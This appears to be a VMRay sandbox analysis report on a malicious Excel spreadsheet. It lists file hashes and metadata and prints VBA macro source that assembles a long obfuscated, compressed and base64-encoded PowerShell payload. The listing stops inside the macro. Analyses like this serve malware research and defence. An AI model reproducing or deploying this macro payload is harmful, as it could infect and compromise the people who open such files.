513813af...b4c8 | Files
Try VMRay Analyzer
VTI SCORE: 93/100
Dynamic Analysis Report
Classification: -

513813af1590bc9edeb91845b454d42bbce6a5e2d43a9b0afa7692e4e500b4c8 (SHA256)

=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls

Excel Document

Created at 2019-01-09 08:38:00

Filters:
Filename Category Type Severity Actions
C:\Users\aETAdzjz\Desktop\=UTF-8B2KfZhNmB2YfYp9ix2LMueGxzbQ===.xls Sample File Excel Document
Suspicious
»
Mime Type application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File Size 36.79 KB
MD5 5c3f96ade0ea67eef9d25161c64e6f3e Copy to Clipboard
SHA1 524f2c9f62703027b1ebbf1fc16a4a7506d6ff20 Copy to Clipboard
SHA256 513813af1590bc9edeb91845b454d42bbce6a5e2d43a9b0afa7692e4e500b4c8 Copy to Clipboard
SSDeep 768:+Vp5c6cJjgv820s9i3FwEUddPwZS9BAgVx6SsfG2f/:+X5ncxgv8KWYGQ9HYSUf/ Copy to Clipboard
Parser Error Remark Static analyzer was unable to completely parse the analyzed file
Office Information
»
Create Time 2006-09-16 00:00:00+00:00
Modify Time 2019-01-08 06:51:21+00:00
Document Information
»
Application Microsoft Excel
App Version 15.0300
Document Security SecurityFlag.NONE
Heading Pairs Worksheets
Titles Of Parts Sheet1
ScaleCrop False
SharedDoc False
VBA Macros (2)
»
Macro #1: ThisWorkbook
»
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub New_Macro()

Dim str As String
str = str + "$content = ""H4sIAAAAAAAEAO19C3gbx3Xu7ALYxZtcQAIoiRQhSpRhvkRSb9myRFGSRVtvUi9bMgOSEAmLxEILUA8/aDqu47qOU"
str = str + "jv9nNsoTms7bpI2L+eLc5M0yZfk3rapb/Py17wbqW6br00at2mb5Oa6Saz7nzO7wAKkFCXp/ZrvfgWN2TNnZs6cc+bMmTOzA3nPHY"
str = str + "8LjxDCi++VK0J8VMjPVvHzP7P4Rpv/OCpeCHx+2UeV3Z9fNjSRK6YKljluZaZSo5l83iylRrIpazqfyuVT2/cNpqbMsWxXJBJcYdP"
str = str + "Yv0OI3YpHvG/bmuMO3ZdFiwgp3ULkkQlK3FcvIEnh+7TNHcGq5FuIyhONGS/4sfVhIer5v8qz/ODPb4DuPiHpdmvzCPlpIcJ47H6j"
str = str + "EI3XoZPyB/z5XVk/8rtc+a5S9lwJz29N2XLlK3y7SLyuyypao8Lm7WkhiRaq623Ff11WdtIclbwSz0zr3Jx622rZ/OgF+dzFTXxi7"
str = str + "LAQ31krhCL4O59GrvmJd3uZPbQ11GAi1N6h6RdbLWQLJvQe7NASsxhSr1XnxvQAoyePhnTtTbneL8xQhQ5fugn9zzRIGLrXkheaQb"
str = str + "g1YaGg8KzVirT5XDqGkjRMWGtb0u0R3TYf1o0oTRugb60mCLWCrTO9IJaOA0wvoGQhkpWXPSsvizbFNoqODuEBqCzp9omjGqvRKLa"
str = str + "AerCYQO2QBXsthBNxvX2ZX2/ONN9jJoF+Ke6P+dMNRJM6ChsQJq4b+uKeb84kqM8gibIIRZGZZchv/DcoJJ0gJGh7uSS9mJTRN7OK"
str = str + "6oNxzboVXc2QjaeXoIgLrNsdYdLoV5vl1i12FW12BWWXV1Ncyg1l60PVrZc7rcnECiZ0HOw0uH0F0XGHpA9a2kous0HqYbbMvaSFI"
str = str + "fEmj87SwyU3ZZuDPeEEFyRmSQOX3vXalSsVzuMBphIPGoEZEkJ2PTazhAwjwY835VjVF1c22mYw00y9XXy2NTnjd3T2bGvDzFJknm"
str = str + "1d5H+2dTGr8NnWJazFZ8mgglKEBuozeKmlzAR61yJGgDUYcKkjagRduuj+RST8059duSIRl1evvPQR5GyOK+wyr/70UuKrnlrOGFS"
str = str + "kETOJ1rgv7mV7s0wat2ZSkMb1zBQZ9vkyl/e7sPeXseMu7CNl7IGAdYEMK0U9sS3MIfwOp/LGL2FKBKz3OPWtjxMjSyqNNnwAFebr"
str = str + "vGNDwPoMVYasWsKEQoJmC4m5wBndzrPWS6gQDwWMkE0tGfe1Z+YVMDGfKB1rA9YNiigk08upedgImxi+YEPvYiOcNFupy5XU4ATXu"
str = str + "cHuwquxTu+Hk/MampkmMRf/9MqVYopsImJEtPvXUJGv46gRuZdA60kQQFW4lGDSbHPosvKs9yhzhZS0ZeN7CbY+otg8b/rAT65cMb"
str = str + "wbye3OJZm8sJxNu7nr7WY7eazExVg03UFuKnkxVichm7ARNeqOxutj9enOmi7dPaehN+1qhWaX07L9dYav87jh7XRknsvbr9iDEZm"
str = str + "DT9dRy9WyyWo2r7KafvPfoaaIjZdUVjtUVpd7rUZFHdTlBeYqZyzSWBGClzYyOa5WscCORutFMo0qaXQQ2RBEdWFEXtMwpFoRq1Ow"
str = str + "2EvmY+DjlgL0goZhriHDXkS8GOZaGqJLL7565UqFh7k9XHo3KvTtlmvOEXxfwYLQr8oFt14uv+IxHxYJPD+EJ5gWSRv/Y5+Mz9aj8"
str = str + "jIbT+vVxYCgWM5Qre8ptr+Q5v1eWtwXO6vnjxXyiUnrZ/xssBSVnossHz0T5jpi+KKUx1xPa177Lt3cAKAEh6eE/eZGwJrUYJff3O"
str = str + "QI7zdvogkRAJmkh6W01lfgS1cwSXTzZprNz1829Gk0USKBDi1gbgbuW+66qjWqVgnwEAmw6JoCOIzHvYY3fQsN/Bbi5iGU8dJiQmP"
str = str + "BhKTP7Kb7CEssX25xDdX8NcSlrWBftR6p4qvDUpPJdIDqV4wqZb2rIkkNnUv/rhOVK6hgeTywdWKqXsyEUEuVpmMFPFdt/Qlu3eqp"
str = str + "0s0fkW54htT/PB0lWUdxn+FLXrQ2EhmOEJJywbL6Kj1fOoCUqs2uZF/YcHH2BgYWXZxNM7D44uyNDCy5ONvGQOPF2XYGmi7OdtJCJ"
str = str + "6keAtVZ8t6XfkbxlHWiiv2ONhbe3Marx9VF/wy3faRa9A/+AmahedjdUFRWcTMdC2r7OaZVtGnoFCFqcb+hGX6OGK13XJXD6zKin/"
str = str + "hIig9Xa2CLar0IDK9KtkGo5YVgk1wIPHagW8vuHzHBv6pWSxO8RLNxoV6qhWeAQs36UUgK+oGHFfSAl5CdjFxkIxfPgKD3jRhZBWG"
str = str + "TjWycgYl7O3Vexdp91o/Jclu4XZNdZSnH7PNWaQ7YdZqDD4QrPTaHHHT4gYgLHXHQUcl5HZWB/Xab/eY6p0I9B0vz9ZnecdVBuHTO"
str = str + "Sxr7SbXGbvb8wg7SPUj3yUGKB4o76RFMxEMbHqOdQ2gHNIddlRCIvMVb8P0avjQ+d+H7+4r0+x2ouuEQ1UcodJGNz7yVOtmytQpZ7"
str = str + "q9D9jdLo4r4NOl1j7B0Ixt889H7F8WNlAYgY4pgxRpsAn+izEPgA9UEfG4CvhoCD81HIO8gebik//EnZ8nA2rERDLBEspWksnk+Ku"
str = str + "lqNsJuNsI1bPxUzEPgH6qQ0gBtAjMRZwbYBD4+H4F3imuOTJ1rZOqqR6Y9X0us9/g8GjFsjRi1GmnvmtO+sYJhT2vI3YSsb4SwFw0"
str = str + "ZISOQhkm0bxnHRoSnkBE0B2idvO3qHut6fBoicEyoJd4qnzY2x4PBBSNAL2M7JTZx8QGtovs5xcmLD+jlYqvVW1mf2PVb7dW9aon0"
str = str + "7eSlacLKZaUsoMrR+ko1meD12lqPljyh2eNaO6qzB6qyv7xyahBYJ/vuk0cz+/Edwvc5siPX+ckVfBFVil5otcUV8yXgoTJ4nvVU4"
str = str + "9dh1i0E7nZ/NZ4+EwH5dfDxblVg70ZnZYbqoTOT9qCWPBrUVLaMXjURVLWLbYJiSVNlv4VYktRQtTZZx7zVmESQc6GZqNwc04Nhnk"
str = str + "o99TM8JWmjnOAyYZ0AhYQciZXsueQxh48OJQjydSR42rAZS3Q9zwcPPxmNQLRmOxhNzsYo4qBtY5jmDuceQl9L7MXwgXhlpUn64dt"
str = str + "V+HV5OIClz0PP9B5BpzTUtGNPeq+Q8VKiwdzHoHUJ5Bqvn1zrEsNn00zvJya3W1t8CIioknXAdw3WrA/6eNmZj72AbcYh6y9Ribc4"
str = str + "1hVAAbmh53ylpE4ThTo1fYCKDhKiCQhdVh0k6w3qM93Ue2UmBThGimuXT+nWKs2eZLp1rwPGvbIeTMZwwGTwsrEyEfR2BDgaRuOuy"
str = str + "1BiQOuU4XHbjObYgVQFGmsbPwt3pPNIthlam+izD1lpvfwmLGOVKueHs8fZ4uE9ktEedB2/JGmwdD5Z6/gOPzq15Cxh3VvvjlCCcZ"
str = str + "deUynGY9e5Srf+GjLVC0+HX03DXDUy50QoEebjPvu07l9oAsa9ss1KPo0KVB9KxX2VQ5245k0PcRwQC1rfI40dIk1zkR4TPMYy548"
str = str + "prlxA5efK5qD7gGsRH3DJM60GQ4NBGDqswfCTaQUQnMG+WptgeEvtw67mgPu0iw+36LTLdYrVbGCWxr2V4TC8zcFbll6h4yo+uboE"
str = str + "xQdmKCDgcJBFjIeSIY2zR23dHeuNJUISpvVFO4YqYVUzQnKqhAEdDc6rrMjSq0roPspbdFU9QgFuRUIVbk2SUiJQihGWWdZEPJqI1"
str = str + "7Gfitcb0drTNuDqXdsCx1K+TN653vqBVrXMLJn3iMqXjNe1F36B06sGUL5Rr6LMNDrmPU9LoPZAdW0PasuZ5IFsRt3GFRhC/8Ztr1"
str = str + "25cjkpJag5B7ksJLoyz+h84VXYyzIPz7HyPKO9Gm0BrbPok8MFGWGWI3HrXt0+Cgxy1BuaT8aN46jPvnTjCUAeC8u5XbIHeecklzs"
str = str + "hI2iSRmBd0KXra5Suz/odzi+xhzKs+uWRXyTAB37JLa/QiT+PrZzvcbkboOM+f/sNhjdg+OV5IJ1pNdQc4cW9hh/zwW/4JbneL6JB"
str = str + "4lr13aWuEzJaKNKYNe3JY9hm+gzdPEzYQCzArwbiGuOOODXpBAuAJgFMQgl40VRGbrqhOYAdy+nx4KUxzEG556ng9vvmP4Xd2KxWa"
str = str + "b2z3sMHlrLwHRgC62M6ncGqzhksHaKScXUuqO3jFS85wYhUbBTVrnZ2aQd8cjzq4vWJuLGB4+16w7gYjxkxO4T+POFiiWolGbFkNU"
str = str + "KqPG7EGmorLpqv4gIjzuQbeqNG3GryO9MnLO0imoxH2ieMOiPeXJ8+KujNTXX7OiMCW4gYCySVVQG7XftqNFrwcxoZSOmIsP5NuS1"
str = str + "RzEWXsjsM3airKPP3Md30WMS1T9GNqAO46lG45+GDdEnloDwzX6gaC3m8WuVghXV5AMXtpHNY4EYRqQ7qcmZhFa7BU2U3ZY+16TnF"
str = str + "LqjM5U2P18zg4C8yg5f73TM4nlCNhDS4pJG8isHdqzqTejHq1M61BqNBnqOVA1FCOdNvidFgLKmZfosYd0TWTNZObXTSICdgg7FIA"
str = str + "ouMxRJYrBsNzuAscoDFFU5fYs1UJtbraWL1QWJN2kejajSmjxHUZDTZbybml/kRtNTLdWpfOBAzlbp3Ui/70Et8qWostV+CNBvN8i"
str = str + "UI+0SjeX5K7sML+1VDPOUe2zeTQ+WZviwRb5GjsDwRX9G+y0gZKy5aj5Ynlj1BlmGCUEms1d7LLTdaa6fJcqMFE6TFWIF0hbFiUc+"
str = str + "HjJZOTSL1WEvVZFjmAMvLAl+ecs+nZbqRSlysFO6vUeXlLbWIrpW8ULW60NXwx8swaguDtmvldZLuK7wba+Ln8O2yz+jpfXNE4Vfy"
str = str + "BqsoOPdod769aEiXu9FQ8Q6k2MfciUdzV/o4yX8CicRYT5CS7yrnk+awC35dGU6YGRd+pNL+A34K80eJ6hhjsySb3zxJmHEkQc2Og"
str = str + "pf5zYka5JLXVO9wh5+dSORyuxfgQgZTlxvjXm+5xDBcQQbUprUFSG/yffpa8dF/Eo1y7+kRdNUhQHvKGdrU39E8ducp+626Nrlcqv"
str = str + "nY1jtyYT3h50AxHFPZJmKedI44D6CLP992Z0RvXmDeTTZ+olMPqKeOBtuDeBxLn2LuUeme7XcEtVx6UvCWm+8kYOTpKomRnqJKVii"
str = str + "A/aplBMrbUGtPBQ5r8mKC33qQqrXX+W2EZj1CCL1N0rwbYx8qj306T+NrkioKZO2+RFxr34glX7tIh87maUL6Y/7XEo10tkTqsi4E"
str = str + "nBOfIGqwBtujBvbkCAcQLbwp1/sp610VxviEJ8QihLm7SDrEIUPzAtsPa67z3YDrWFd3neb6Xce2hrfqgPbqB72u49prHPVWDm+ve"
str = str + "jbrPsCVZz/2wa/hoGPyzMdGx63vQwFy2WhbqtLtDY2eC+gp+KzikIfvvRi0cZP3M5J2mOKV+7fVtJpV9mc+eddAU6+6TdMuR+QFh3"
str = str + "jo0v/BMlS1a9Ob3LuXBtq90B7MtTmzNzNL7B1Zo2tDVrn0wbuyla4rEP7aixzMQKCyTXPXNfyVexKd3xKVSwzxgBFgTbOxyFdf7DD"
str = str + "Vyx82Auzi+XV1Q+V1NTWBoHXgcqXc94cuqcgsmSNn1UWLq6oPaqjendkKkTvS2p0XIk7XzktPhjaco9PdcIVVeikv365Ld20B2rSN"
str = str + "Ks1Bd5wwIlIy68cBBzcw76Zs9by3I5rmvUmhJyIb/laQHThdpotEedW8lBfNG4o/IeaPtap2h5X9XqPTEw+RcwtAM6Jwdw3VZc69g"
str = str + "Lqg35FebvnkXaRI0jXUXkPukNjrdBqG63xkYxgbR73TE+jUeEDa/G1GiH05r4HdommPiMh30z8Ru/oVhulMkU7YI5U1MJQIb/hroH"
str = str + "Q/B2CRQPPEsR10jS9B55pCXkuj99fw4YIu/b3BXl/32u9KNvy2II98JWBfVgpueCMjmG9GtM9olidYzhU0eXYucyOapVfKhjQrVMn"
str = str + "t1Ky6Sm6DZsUruTaNr5TZuUbNSlbKohoWoXIkE8R+MezXeZ3cshCBvtZGelCUn6OH7l9KD0uCNXpoDrr1sLxKDzcE3Xpor9LDqio9"
str = str + "rK7Sw/oqPdwUdOthy/XrgY2MbGYJ1scB+JAo9OFNpWBBPfbpPAdhQTVxka/xScv7A8UO9UN87BvGdOugwCpw0b4BZZ+vyU3Z6vT8F"
str = str + "6n4NMLwJhPSsfja16RLZPjT7O25TeJiTKt4pnlbGT7Xy/yFmtUP6bE35zBKvoCJa9a+WqS7VadZYTa5asTwypcy3pDhm/e60CzV5i"
str = str + "aVybjycttKlpwLr37z8RLtrAPJo5GAH5vOv6D7bBVFdbXIhWOe5t6GO7h9m87MpcNUTc4ivrlBa7E25/1Qm4qhab+DxoVCGtcrqG3"
str = str + "craHbapxHhfp8KnQjHSl6n75a7+W4MqB0rVfanBic3pfUUWx3BnVV86ywL3/Qu4qHat9eBC8HpGI5VhXOvc90WgSce593yvjemKe1"
str = str + "1OudFzajKt1ubdB0VW+4Q74daK5PY0oHnyrfZP1b5kgzz5Mfpn7JrYYvC3+l3/37K/3uEXzW/R/Qrxa+7Fu5QPYkyn3t3Cl8si+vS"
str = str + "Cm0mgmjeI+gU4R7aRTuK4PWnRgc6zQS8/4K8gLyM3Tpw418hpBtNUhqOdNejWwOW58kgjPkAx4gH6DVdKPV9KDVENdq6M7QTRRLCZ"
str = str + "GtzAqKjB9EqrO6rVDIOSut2fuy1dYcHfCL2kp2FuupV94LdvZ/9GlU5NdT3v/5BEUFcUePHG0FmQtphiFbH6vBjLUPyQxRZt9pvt6"
str = str + "tmWGUmQ+R4VJj60FkPdbbQvYJK9MKt87QFRy/+Rs0WVrNh1n71O4NrEydCyJMICB18KFfQQdx7+XgSn5pAAg+vK1iR1/5CtmklP8f"
str = str + "/p/I/1nK2kLTVSKPdcnRhfX6sCj4zUf+k5Tg6OCb3wQtWwfYotP9vKvNpasJP0NXq1TrTWFnlH+zrD3pMkLkMqjz0GWhu/Q/OAiPb"
str = str + "/dNe+qF1X076py5Ngv3z9W2w9JzDkvWV8M0uVjZyRB8SsJmpczLyZMVn/JBGdtIXiBDWRHaHL60a/Nl8/Fth48QBpa0E2aG/XJgb4"
str = str + "788gMbcVQbuSxc5xWGePKdjj/2iE8q/D7ESIn7v/neYDJkHx+NRSpHRldc8FPRCry+rgJfdsHT9Q7MVysRoywzfPJyJS3Rzj6f19Q"
str = str + "eLckBEyrwrcmvXl5o+PjaJJ0OdNDbAXlz0mtUjjE2GPPeiNgJdNhvfd64msooDglreT/v6e52urZ8sTLpSMA6FbtW84geSD+KZ7nx"
str = str + "vZXGca+tvA/HKsp4MVarjBVuZSDEQEDhFqZaH395FX3IV2J2ZWf/oiLC7votmioE55SeiwrDNIcet8+GrL8DQ85BnPXthXbUG3Iwi"
str = str + "YSNCad/i5h6jGwxmX4jGewFqrALFZLmmwh8DqD1OSQ6G6Kc4Ijng7qWfpwqfCdhv55PP0EauGzMeVVX/k3KzIwwaL4vVdNvJpHo7O"
str = str + "kx+dsno3xpTU3KS2sNSXlpbUNSXlo7SE++KcYv8BIX5dUDDi3pRkHz0ll60ducmqV3u4tm6bShedGsXq5EcZ28mJXkX+7wQM6GOE8"
str = str + "XO5rHZiNcha52OC92+dYnsVOw2TlnszPDz8XWb/FzifVmfjZab+Fnk/UUs0ubAOudSfviqLwMJa9zNAdn6aKE9X4qpCDT+h8ELeRq"
str = str + "Ca6W5LShzOqisijY83qdQw3ry7bCvm5z+C2bw5dtDr/NnNB7a+s71AW9ybB+SBC947C0BkC0fyiPwHkhCQYbJEGtQRKM0nOWdh/X8"
str = str + "TJ1NiWcH5DM+wsbhlZwndZyfmUZuqEMpcvQjWWorQy1l6GOMkQLLbvu2S5irrx1CtqHObP8E6IYyd3NDPSUFUu/q2q7S+X79arrqr"
str = str + "uXo/Ztg7dtU+xrSfT7tDNrurq7Vnev7tkoeKc7ifRpmNZyrAxhGNanUWn5YMnK5ceLVONzGNGbweLyQ4PC3yN/v7f81kMD2/FsQP5"
str = str + "L6Gb5tkk6+hZyfgvlSJMqArTZ/ndlNS1K1Ds0zb8TBGt8J4r22vSiw75zz++/qZ5H0rB/U/hxr+RcE//o+YhfE0e8lC71POyvE1+j"
str = str + "nZzY6blD08TnOX0/p7d4KQ1yupzTE4zv9fwu2tZz+gRjznniPk1MBF9DeiL0CFj+veA9QbTVXvMFxVO+CWBmtYmAJuLKq15N/JlGN"
str = str + "Xf5HwFmoUp1IsGH/UGxEK2C4kS4Gemk1qNo4kcq8ZnxUf0PMf0fcZpW/wA89+vUVoSJ/vsClH5JpbRBp/Rx7vGUoPqdKqXfDVLvFw"
str = str + "MEv4K2UYR4PbombhJ/D2rLw4R/3keUf0d/GP0azP9l7WH/Q+Jh2ryJKZ1K7+F0GdN81kd1dgeI88fCLLXv+ZAmHvMS/mmN8HfqhN8"
str = str + "fJl09Fz6Gtjdz+n3QF/aZCY2awmP4bZ8Z7OOcB86TcH3YHaY418q5tRh5Q6wLjXsMsVSboP2Wn9L/5T0FzDc4jeqUvsrp7woq/YKS"
str = str + "p/o6pf/sP410cYhK2zj9Ftf8336i+XGF6j/L9X9bUDrJdW7xEf42Tj/tI8xTTO0jnPaFiObjQSpdoBOdk8zVCKdf4FZKgPBamOCPM"
str = str + "f1h7usop+9QKb3JT5Qvhwj+DqdbmabJdZ5kagcZs5PTp7yUvjs4jVZjXGd/gNJ/8RL9v0QdTTykUDogzns08SS0sT9FGn9CLNLu9y"
str = str + "jic3buBe0hjyoalsncB3TK/fkNMvcOvR+5V3pkrlV7xOMVC3plrhB+E+i+d43M/Y7vLZ6gWLBB5l4Wb/dExM1bZO4bvuc8dWJiq8z"
str = str + "59BNKTHzbzvVo9ypxsaFP5l7j3Pu32e2UVuxQ/rud+zRyC8Sn7dxXYBULxdadMrdbb4Wr2HWrzD2GmklxdJfMeULv8TSIT98mc/Fw"
str = str + "q1gi6m+XuQlfq2gUv2nnHvd2iybxQzt3IviQZ6m4eY/M/W2oTSC31+YMuZTYuk/mlqK/FvEJO7dL/5Bnudi1X+ZuD7bCWzUckLlbo"
str = str + "GtY8yDl3iJu1Cn3Xs69oaGAudcqXuDcEw1n/HPLbj9MuYcgG+Wqy2gmbQ1QSpe3VYw3weMhgv8iSHAhTPCn6FqJiFEQIN6nEP6zor"
str = str + "5eFaeReuxWn2Uv+l1yxuLFEJWuVam0nzFRndIvhyg946NUtrrfT+kXmYdAgFo9yTQf81VKm8KV9GtB6uWtagXez/xUpwFsGRXYNUm"
str = str + "5CGlQ3Ii0XvRwupHTPk4HOD3A6TFOM0gXihzDpzk9z+m/MrVXxXAgJRTlBxi9V8VhxJsBpdPXLQylMbBOvCS+H9ws3so13yreE7pL"
str = str + "LFIO+cZQ82OYx6+K94VPcavTSHeADsHnOJ0Ry5SnfG8ArPvHxKPiFd8F8aCgtsuUv/e/Wfyh+OvgU0hf8T0tepRnvGNc/51io/Ljw"
str = str + "PPiGfHHgRdEn/KK749B4eHgZ8SA8rL650hl7z5tTHxM/IMyJg4oH1a/KI4pBf+XsX8r+L+J9Khaj/T78LuPisXK3zCFnwEe8uvKZ8"
str = str + "SngmHlg2KfOoY6P+M6L3jrgX9X6Hnxovi6Ct+v1AW6EWMf8i1UXhUXlSWo71eWKY+KzTppbKO2UjmtLAt3KiTpFuClJj/se0qcVv4"
str = str + "uuAOYZeEDCtU8rCjKY8ETyoPKd7wngckEDyuPKnn1XsAP+h5QnlBalIeVt7JcJMujygHl+5AooOTEcwrJ+4eo+aeBbyN9wftdJaBM"
str = str + "i39WSIc/VF7ifl8SX9J8qqK8yxdSn1HOhOvFM0pGpXQZxv0Z5Y0hSqe9lP4TYOIhhpq9wXoe3+eRng81qB9TzkOfL4k6f4P6GWh7p"
str = str + "Uoj3qm+qDzo71WhAXgsRZkF5y8pFzj9b+E96jeUPaEh9RviWPgO9UHYQFEdUCh9SXiCb0SqKE+Jv1HeJp5U/0ZpC7xNDSiPet8N+C"
str = str + "7f+9UnmP8nxNcC/1P9Luv2uxivF9V/VRYrXwRGlq4OfA317weF74of+aj0R74vou0nxPeQ/h23fQVaIswPgPmAoF6mEeEo6q7wcqR"
str = str + "7YC2Gcip8oyegfknv9hjqjeG1SN/j3ewxlE+E+j0HlDXhAc+D3KMqOsVRTxRz6w54/T7AqtiB+CcqsmLY48dMGvF0iZD4KNK4+AzS"
str = str + "JeJlpMvFd5G2c7pahL1diC1iSPvFMqS3i5uQDjL+Tk5Hxe1IT4lppEXxeu+ouBer+EOcLkarvxcjSkH5beX9yk+wc1qvblaH1XPqA"
str = str + "+oT6jPqC+on1JfVn6qqx+8xPN5Z16V5/phBUfkXJfDZ5/kcP6txMgKpxv0J/xsOHmjBi++j4ibo9Sblrfx8mTq5+ZbR4eHtuWJhMn"
str = str + "O+fzJTLK7tHe4WN09k8mOTWeuWkWHKzVOnRwzsyE9PZa3MyGT2dT2if3DFzbdsGB6eNEczk8UesSc3aplF82Sp60guv7pXDJkD+RK"
str = str + "eI+vWSLhnnRjPloYPDe3cgPXIHJuezN4ipovZvn5xtzmCYJpK+wb7BwbE4PliKTvVNbBPbDfP5ifNzNj2TCkjDhXK4BglU8VR05rM"
str = str + "jVDLEoL12xCBT2XGc6MOgX5zcjI7WsqZ+WLXrdl81kIR9TIwxo/+acvK5ktDE1Y2Myb6xoAdkyUDxb5SKTM6kR2bj9RgITuay0zm7"
str = str + "kHxydxkdjg3JqYLYCk7fJLggmWOZotFAkcnc+iBoIPoY8jckQfOnJqCtgW0OZK1hkvm8FnTogpQ92hWTORGrNwYFJQVoxiV8eww/Z"
str = str + "sl4px8WNkp80z21ow1khlH3UzRAXP5YtYqOTkSYg94IPjWbGlH/kzOMvNT4OVwxsrREIrKaIoBGmuzyPAgFInHTsgl+iGtiWduqmB"
str = str + "aJWIAgyZK2WIZpn72ZqayougGqDFn0PVBiGpOlTFsAuDUKd5lFksMsyLzBIF07mRuNEPKHi7lgDli5UrZ3bk8+j5fyFaGxAKLmUJp"
str = str + "Gk8pQVYMWef3ZywAxRLGQ7aEHFMFkLfYBoAew+hauZFpFN06nXPltmdHpsfHSQ8VHBofzhVzVbi+YjE7NTJ5fihXmhdtZcayUxnrV"
str = str + "KVoKGNB9J0WBMRon5rbhjR0OGsVIfTcQgzEydz4tMU6mVu8PVsctXKF6kIpNLc4mJ3MnGOoOLfxfgtDOVqar9PCeSs3PjFv0VQhkz"
str = str + "9fKTg4naeRYnwpN5KbzJVcpUU56IMT2cnJHeeyo6wQc9t5PCay52gGjBA8PjYtDeRwZhLQYLYkgYNs82L73kHwejdmYVf2HMwklx8"
str = str + "+PZ21zg8XMRMx8c+5swP5sey5fSdFccI8O1wYO+kYjZzssHHY/6jJgF1ii9BlDwKV7LTMqW2ZYnbdGnkaIE7C1WVtuGRNO+CQaQMw"
str = str + "aBuy5SpWcjY4OD1iQ2czOfJaAm5WAnsypdEJSieI0E5zcixr7acc6WR3Nj8OkBrtNK1D8Iqjp9iVsF+YpBP0rMUaFvvlP4AkPRlEY"
str = str + "/0zIEXFJMlNCTkxxTYTMzyTR7e5vACCHpY5nR8btswRwLli3xhULW4zkRTRZpt5bseZDKlI8mXKmVpWY/ak7SgFzWsewYrzlDK68r"
str = str + "eir4IrfyQ7sgsDlLVcOGcMh09O5yVmx7nRLJs7szBYylilgfxJkyQnz1tB2B7s9ux5zk7JB/QxOJnNFkRRpvgyH+RPuS3Aov20xYL"
str = str + "3OS36oSlL9E8gGR+zBLltGmTpyMWuUqlwMAsbLJakCAK2kM1MHZSZoey5kg3aC4gcYdvpAKAhxaOUKZ7aJZdjYS/LrPgRUnyOFD88"
str = str + "auZLlkkF9hpGLhVrA3eOUpgy8ttyJch/BssCMnfnSvRAvTPEjLmb7MVRX34sY43tsCzTYls5mB3LWVB+dYlcgYaznHGCgRJgXmDKu"
str = str + "bxZGoZG7VzXqEz5AcMXfSNFR6fbc5nxPPx/brRYOwkHSACzMAhucxjR2mLHoZfLpQ4xiWjdLEorw1OuUkXBjmEIa0exrKQS52hA+i"
str = str + "YnyRUV5WJRzkEqCciwgw25KODGi2LH6Wk4ArE9XxSjmfxodnJYTpwi2VuJAcfdYNAxJcanJzPWjnMFC8ZJXnieqEJIxzFIzmBfQaL"
str = str + "QEE7MztBQsZVKkKywaMcQEiONTsIHs1gOERG4cYPTozQ5SDDbauzpIgb2I/gh3hy+9mZLXYNkjaUiG0SfNT5NwQMIjZm9JZEZHS4B"
str = str + "nIL5C0QwJDa8gBjHF85pCo99I+SoXT7bRVqwkJjESOxpBn6nJ0s0+/s5YhJnsyPDMngSruDFHbaJUftJnoEmRLmczF9IR8+zWdizA"
str = str + "LaHMMZlDEMwBDi4YYpopC/Yn7XsKcwLim0stl/cnQNYYrpFhjlilZrjfJ9lZc4zNEmJ7Aj2ak6XqmbavulSAaj5pppdtAcL3l76F9"
str = str + "pcdlS2T87IFZ9B/qfcxseGp2kFZYChae6gH+yWsntNROVj5llpUrY8EI8ycjkiR4ZlCp6BpRD7Ctk81ip4Tp4k8jkOsazzBPOcB+x"
str = str + "EBG5d7MxM5YCh+EHqgBk5grAH/WxncU0gB/ZT8MdUnEhQZpx+hFkY5qmGYELsmCogFSJSFCWxSZjiJP5EpCDGKjm9T+zGn/D0ChEY"
str = str + "wq5vD/3O2TiOOib2a12Cap+kzRb2eCLQBUrn8BWRTnFIODkltEMcxN8+fEVgL0okzQxyGSH/hC8DemLhcez80uK4OItd32pxv7iR7"
str = str + "ubrNtW6FrusXeJ9XXTqXzeB9mewF70NPI0IcagPPI0JCxjMNchCNNvRMo19ZgZ72ZPYw3aKnaIb6UZxAj11iw6xBr1tAtwDuJd7lv"
str = str + "AGhpW181MlTbSDl/mfYv38rdagxy5Q70FPXSyTu9WN0ENtuxT+RGgcecwvlAhPN7Q8Cnny0FuW3rgs6+fcDaiREtOAxpG3oJGMoHZ"
str = str + "dGIe7sLvOoS5q+yL0htQTwZeeoN45JCa4R2wGQYG0WsRzBJgsqKXstlmUQvft7t5OoiTPrUpVNAbEduq3+S5ItoJrUfvtGKezqD+J"
str = str + "Z4Zl6SzXyYkp2JQJGpiyeGIfyG3EkUFxHm3gKWELKWCwOnO9FPedqmqZ5d6nXO27kD+IPMEp1sko5IEcHliQ7zjZ0RJ3fykhR8CWN"
str = str + "i65OyeGbargSN8HG9qJsqPgFBtrzI7NwsbpQ+Io/WsAtlT9TJNGw91HEfZPusgTtSXVOjoEWcr6Mdw54oj4KTGFUoUfYw4meRfyE6"
str = str + "ztUe6HqI9D5vvw7eE+R3mc82wh/VV1OsAdtZ+kf/3Rt0/cDvu7C7XOoZxmeEpU/kTIBev2k166tebQ2t13SqwCNAkNEGfYspMWjuW"
str = str + "5HxN/p1BSgMapHxqFTrb3KcAmSkrQMM3W+7nkNOd6OHcvz9ku22tQnuazkvmPotyJ59r5ejDG0X7ctjGSVAz/x0mTYR9b0+OydWK9"
str = str + "WActyu8afEeBWYvnanzhAdsHWK85toIUKE/zfDnPM3WaPQbxQaMi6g6US8nLiMiQbUWcMw5yjuzVxtxeLcF9sNQ8bCNvz+mUkD5J4"
str = str + "ouQPgtMjkdfzsrKzBWjsi7xkeN2kyjP40n070N6DqmTR7DL6RlOqTTDcyVVg89UeU6BtYf8QgnyCb1b0J9YO1bjgbqQkx6M8EUetT"
str = str + "GUlMqjOoW53Iu2a9lvb+BnL6B1FV/f2Ysc0d8E/Bp81wNaje8m1JYjtYnXutUoE540vvD0EenT75Zrl4+9fyutVLTOScrHMWc2Y52"
str = str + "isk57/YNXHf3V1zmCZU/3ASd7qFr1fOvJjzRdnR/4xkjVmrzxalxde6WE1Hov9LQWvRV4FOSIT/DaNlmeQ+LOTnHENVaDPLLSY+9i"
